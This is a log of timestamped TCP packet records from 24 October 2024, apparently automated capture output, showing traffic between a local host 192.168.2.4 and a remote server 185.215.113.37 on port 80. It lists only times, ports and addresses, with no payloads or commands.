Oct 24, 2024 19:29:15.524943113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524945021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.524976015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.524991989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525008917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525015116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525027990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525046110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525053978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525067091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525080919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525083065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525108099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525135994 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525158882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525177956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525197029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525203943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525216103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525234938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525243998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525285959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525818110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525835991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525855064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.525863886 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.525902987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526155949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526175022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526195049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526201010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526211977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526242971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526279926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526607990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526642084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526654959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526660919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526684046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526709080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526736021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526755095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526773930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526782990 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526794910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526803970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526830912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526854992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526892900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526911974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526947021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526941061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526962996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.526968002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526988983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.526989937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527007103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527008057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527029037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527031898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527049065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527053118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527069092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527075052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527089119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527101040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527122974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527147055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527335882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527353048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527380943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527389050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527400970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527415037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527426004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527440071 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527445078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527463913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527478933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527497053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527498007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527515888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527529001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527534962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527551889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527565956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527575016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527592897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527605057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527610064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527627945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527628899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527683020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.527955055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.527971029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.528002024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.528042078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640275002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640316963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640336037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640588045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640588045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640631914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640651941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640686035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640703917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640722990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640739918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640758991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640778065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640795946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640815973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.640836000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640836000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640836000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640836000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640836000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640836000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.640876055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641015053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641031027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641050100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641083002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641100883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641119003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641151905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641161919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641161919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641161919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641161919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641170979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641201019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641204119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641223907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641242027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641246080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641271114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641293049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641305923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641310930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641331911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641345024 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641350985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641372919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641411066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641443968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641470909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641489983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641491890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641514063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641514063 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641531944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641535997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641560078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641566992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641587019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641591072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641609907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641619921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641628027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641647100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641653061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641691923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641704082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641722918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641741037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641755104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641760111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641788006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641793966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641812086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641828060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641832113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641850948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641870022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641910076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641936064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641968966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.641978979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.641985893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642016888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642028093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642043114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642045975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642071009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642100096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642249107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642266989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642292023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642314911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642479897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642498016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642517090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642527103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642534018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642558098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642594099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642599106 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642613888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642637968 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642648935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642666101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642668009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642693043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642699957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642716885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642718077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642740011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642740011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642757893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642765045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642790079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642792940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642810106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642813921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642838001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642863989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642865896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642884970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642906904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642931938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642940044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642959118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642977953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.642981052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.642997980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643007040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643029928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643030882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643054008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643078089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643276930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643296003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643321991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643326998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643341064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643343925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643367052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643387079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643534899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643553972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643572092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643584967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643591881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643596888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643610001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.643619061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.643651009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.644315004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644337893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644356966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644376993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.644385099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644402981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644418001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.644435883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644454956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644459963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.644474983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644484043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.644527912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.644536972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.644579887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682326078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682362080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682403088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682435036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682435989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682455063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682472944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682475090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682495117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682512999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682535887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682540894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682559013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682568073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682579041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682594061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682600021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682634115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682668924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682710886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682729959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682749033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682764053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682764053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682785988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682790041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682806015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682825089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682847977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682872057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.682980061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.682997942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.683017015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.683029890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.683043957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.683058977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.683063030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.683082104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.683084965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.683136940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.758218050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758272886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758299112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758316040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758333921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758352041 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758372068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758414030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.758471966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.758599043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758618116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758637905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758652925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.758654118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758718967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.758878946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758897066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758930922 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758932114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.758964062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758965969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.758984089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.758991957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.759002924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.759030104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.759037971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.759048939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.759079933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:15.759089947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:15.759090900 CEST	49730	80	192.168.2.4	185.215.113.37
